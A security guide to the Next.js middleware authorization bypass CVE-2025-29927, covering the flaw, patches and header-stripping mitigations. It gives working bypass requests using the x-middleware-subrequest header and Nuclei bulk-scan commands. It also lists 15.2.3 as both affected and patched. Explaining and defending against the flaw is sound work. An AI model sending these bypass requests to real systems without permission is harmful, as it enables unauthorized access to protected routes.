Next.js Middleware Authorization Bypass - CVE-2025-29927

A critical security vulnerability has been discovered in Next.js that enables attackers to bypass middleware-based authorization checks. This comprehensive guide analyzes the vulnerability, demonstrates testing methods, and provides remediation strategies.

Key Takeaways

  • Critical vulnerability affecting Next.js versions 11.1.4 through 15.2.3
  • Allows complete bypass of middleware-based security controls
  • Simple exploitation using a single HTTP header
  • Affects self-hosted Next.js applications using middleware
  • Official patches available for all affected versions

Technical Analysis

Understanding the Vulnerability

The vulnerability (CVE-2025-29927) exploits a design flaw in Next.js’s middleware processing system. At its core, the issue lies in how Next.js handles the x-middleware-subrequest header, which was originally designed for internal use to prevent recursive middleware execution.

When a request includes this header with specific values, Next.js skips all middleware execution and forwards the request directly to its destination. This behavior effectively bypasses any security checks implemented in middleware layers.

Exploitation Details

The exploitation method varies by Next.js version:

Pre-12.2 Versions

GET /api/protected HTTP/1.1
Host: <redacted>
X-Middleware-Subrequest: pages/_middleware

Versions 12.2+

GET /api/protected HTTP/1.1
Host: <redacted>
X-Middleware-Subrequest: middleware

Versions 13.2.0+

GET /api/protected HTTP/1.1
Host: <redacted>
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

Impact Analysis

Affected Systems

  • Self-hosted Next.js applications using middleware with next start and output: 'standalone'
  • Applications relying on middleware for authentication/authorization
  • Systems using middleware for security headers or routing logic

Not Affected

  • Applications hosted on Vercel
  • Applications hosted on Netlify
  • Static exports (where middleware is not executed)

Security Implications

  1. Authorization Bypass: Attackers can access protected routes without proper authentication
  2. Security Header Bypass: CSP and other security headers set via middleware can be circumvented
  3. Cache Poisoning Risk: Potential for cache poisoning attacks when cache control headers are bypassed

Detection and Testing

Using npm audit

  1. Check for Vulnerable Dependencies

    npm audit

  2. Check Specific Next.js Version

    npm list next

Using Nuclei Scanner

The official Nuclei template for CVE-2025-29927 is available in the ProjectDiscovery repository: CVE-2025-29927.yaml

  1. Basic Vulnerability Scan

    nuclei -u https://target-nextjs-app.com -t http/cves/2025/CVE-2025-29927.yaml

  2. Bulk Domain Testing

    nuclei -l urls.txt -t http/cves/2025/CVE-2025-29927.yaml

Manual Testing Steps

  1. Identify Next.js application
  2. Locate protected routes
  3. Add x-middleware-subrequest header
  4. Observe response behavior
  5. Verify bypass success

Responsible Testing

  1. Only test applications you have permission to test
  2. Avoid testing production systems without proper authorization
  3. Report findings responsibly to affected organizations
  4. Follow the target organization’s security disclosure policy

Remediation Guide

Official Patches

Update to these secure versions:

Version RangeUpdate To
Next.js 15.x15.2.3
Next.js 14.x14.2.25
Next.js 13.x13.5.9
Next.js 12.x12.3.5

Temporary Mitigations

If immediate patching is not possible, implement one of these workarounds:

  1. Load Balancer Configuration:

    # For Nginx
proxy_set_header x-middleware-subrequest "";

  2. Web Application Firewall (WAF):

    • Block or strip requests containing the x-middleware-subrequest header

  3. Custom Express Middleware:

    app.use((req, res, next) => {
  delete req.headers["x-middleware-subrequest"];
  next();
});

Security Best Practices

  1. Defense in Depth

    • Implement multiple layers of security
    • Don’t rely solely on middleware
    • Add backend validation

  2. Monitoring and Logging

    • Monitor for suspicious headers
    • Log authentication attempts
    • Track middleware bypasses

  3. Regular Updates

    • Keep Next.js updated
    • Monitor security advisories
    • Implement automated updates

Timeline

DateEvent
2025-02-27Initial vulnerability disclosure
2025-03-14Patches developed
2025-03-17Version 14.2.25 released
2025-03-18Version 15.2.3 released
2025-03-18CVE-2025-29927 issued
2025-03-22Version 13.5.9 released
2025-03-23Version 12.3.5 released

Conclusion

CVE-2025-29927 represents a significant security risk for self-hosted Next.js applications. The vulnerability’s ease of exploitation combined with its severe impact makes immediate patching crucial. Organizations should prioritize updates and implement additional security layers beyond middleware-based controls.

Additional Resources

  1. Next.js Security Advisory
  2. ProjectDiscovery Analysis
  3. GitHub Security Advisory

FAQs

Q: How do I know if my application is vulnerable?
A: Check your Next.js version and verify if you’re using middleware for security controls.

Q: Is my Vercel-hosted application affected?
A: No, Vercel-hosted applications are automatically protected.

Q: What should I do if I can’t update immediately?
A: Implement WAF rules to strip the x-middleware-subrequest header from incoming requests.

Last updated: March 25, 2025